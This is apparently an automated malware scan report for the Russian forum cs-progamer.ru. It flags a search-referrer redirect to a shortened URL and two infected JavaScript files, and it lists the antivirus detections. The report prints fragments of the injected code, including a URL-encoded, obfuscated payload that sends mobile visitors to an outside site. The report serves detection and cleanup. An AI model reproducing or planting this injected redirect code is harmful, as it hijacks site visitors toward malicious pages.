New scan:

Malware Scanner report for cs-progamer.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://tinyurl.com/cev9eda
1777 websites infected.

The website "cs-progamer.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://cs-progamer.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: cs-progamer.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 28 Sep 2014 10:20:47 GMT
Location: http://tinyurl.com/cev9eda
Server: nginx/1.4.4
Content-Length: 0
Content-Type: text/html; charset=CP1251
Set-Cookie: session_id=688d843596062406e58b1008952c7b77; path=/; httponly
X-Powered-By: PHP/5.3.27
malicious

Scanned pages/files

RequestServer responseStatus
http://cs-progamer.ru/
200 OK
Content-Length: 40543
Content-Type: text/html
clean
http://cs-progamer.ru/jscripts/ips_ipsclass.js
200 OK
Content-Length: 6808
Content-Type: application/x-javascript
clean
http://cs-progamer.ru/jscripts/ipb_global.js
200 OK
Content-Length: 17244
Content-Type: application/x-javascript
clean
http://cs-progamer.ru/jscripts/ips_menu.js
200 OK
Content-Length: 6205
Content-Type: application/x-javascript
clean
http://cs-progamer.ru/style_images/lifeslush1283451535/folder_js_skin/ips_menu_html.js
200 OK
Content-Length: 8292
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)





var css_mainwrap = 'popupmenu';
var css_menusep = 'popupmenu-item';
var css_menusep_last = 'popupmenu-item-last';


var img_item = "<img src='" + ipb_var_image_url + "/menu_item.gif' border='0' alt='V' style='vertical-align:middle' />";
var img_action = "<img src='" + ipb_var_image_url + "/menu_item2.gif' border='0' alt='V' />";




function make_image( img )
{
return "<img src
... 3337 bytes are skipped ...
1%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Ikarus
Virus.HTML.Framer
K7AntiVirus
Trojan ( 91ee82b70 )
TrendMicro-HouseCall
TROJ_GEN.F47V1028
Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.189
Kaspersky
Trojan-Downloader.JS.JScript.cb
Fortinet
JS/Redirector.LLX!tr
NANO-Antivirus
Trojan.Script.Iframe.brhxqu
F-Prot
JS/Redir.SA
AVG
HTML/Framer
Norman
Redirector.JB
GData
Script.Trojan.Agent.GYUGG1
Commtouch
JS/Redir.SA
ESET-NOD32
JS/Redirector.NJG

http://cs-progamer.ru/cache/lang_cache/ru/lang_javascript.js
200 OK
Content-Length: 2568
Content-Type: application/x-javascript
clean
http://cs-progamer.ru/jscripts/ips_xmlhttprequest.js
200 OK
Content-Length: 3619
Content-Type: application/x-javascript
clean
http://cs-progamer.ru/jscripts/ipb_global_xmlenhanced.js
200 OK
Content-Length: 5981
Content-Type: application/x-javascript
clean
http://cs-progamer.ru/jscripts/dom-drag.js
200 OK
Content-Length: 4105
Content-Type: application/x-javascript
clean
http://cs-progamer.ru/jscripts/ipb_forum.js
200 OK
Content-Length: 11601
Content-Type: application/x-javascript
clean
http://cs-progamer.ru/jscripts/ibs_live_stats.js
200 OK
Content-Length: 6738
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var _data = new Array();
function lbls_init()
{
var sd = new Date(lbls_start);
var dn = new Date();
var nm = Math.floor((dn.getTime()-sd.getTime())/1000);
_data['sec'] = nm%60;
nm = Math.floor(nm/60);
_data['min'] = nm%60;
nm = Math.floor(nm/60);
_data['hour'] = nm%24;
nm = Math.floor(nm/24);
if (nm >= 365)
{
_data['day'] = nm-365*Math.floor(nm/365);
}
else
{
_data['day'] = nm;
}
nm = Math.floo
... 3385 bytes are skipped ...
1%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Ad-Aware
Trojan.JS.Agent.JAB
Ikarus
Trojan.JS.Redirector
nProtect
Trojan.JS.Agent.JAB
K7AntiVirus
Trojan ( 91ee82b70 )
TrendMicro-HouseCall
TROJ_GEN.F47V1027
Comodo
TrojWare.JS.Agent.TC
Emsisoft
Trojan.JS.Agent.JAB (B)
DrWeb
JS.Redirector.189
ViRobot
JS.A.JScript.6610
Microsoft
Trojan:JS/Linmobe.A
Kaspersky
Trojan-Downloader.JS.JScript.cb
MicroWorld-eScan
Trojan.JS.Agent.JAB
Fortinet
JS/Redirector.LLX!tr
NANO-Antivirus
Trojan.Script.Iframe.brhxqu
F-Secure
Trojan.JS.Agent.JAB
F-Prot
JS/Redir.SA
AVG
HTML/Framer
Norman
ShellCode.V
GData
Trojan.JS.Agent.JAB
Commtouch
JS/Redir.SA
ESET-NOD32
JS/Redirector.NJG
BitDefender
Trojan.JS.Agent.JAB

http://cs-progamer.ru/index.php?s=cd6b8b321ce224693530439a581646a7&act=Login&CODE=00
200 OK
Content-Length: 10673
Content-Type: text/html
clean
http://cs-progamer.ru/index.php?s=cd6b8b321ce224693530439a581646a7&act=Reg&CODE=00
200 OK
Content-Length: 9847
Content-Type: text/html
clean
http://cs-progamer.ru/index.php?s=cd6b8b321ce224693530439a581646a7&
200 OK
Content-Length: 40543
Content-Type: text/html
clean
http://cs-progamer.ru/index.php?s=cd6b8b321ce224693530439a581646a7&act=Members
200 OK
Content-Length: 74722
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cs-progamer.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cs-progamer.ru/

Result: cs-progamer.ru is not infected or malware details are not published yet.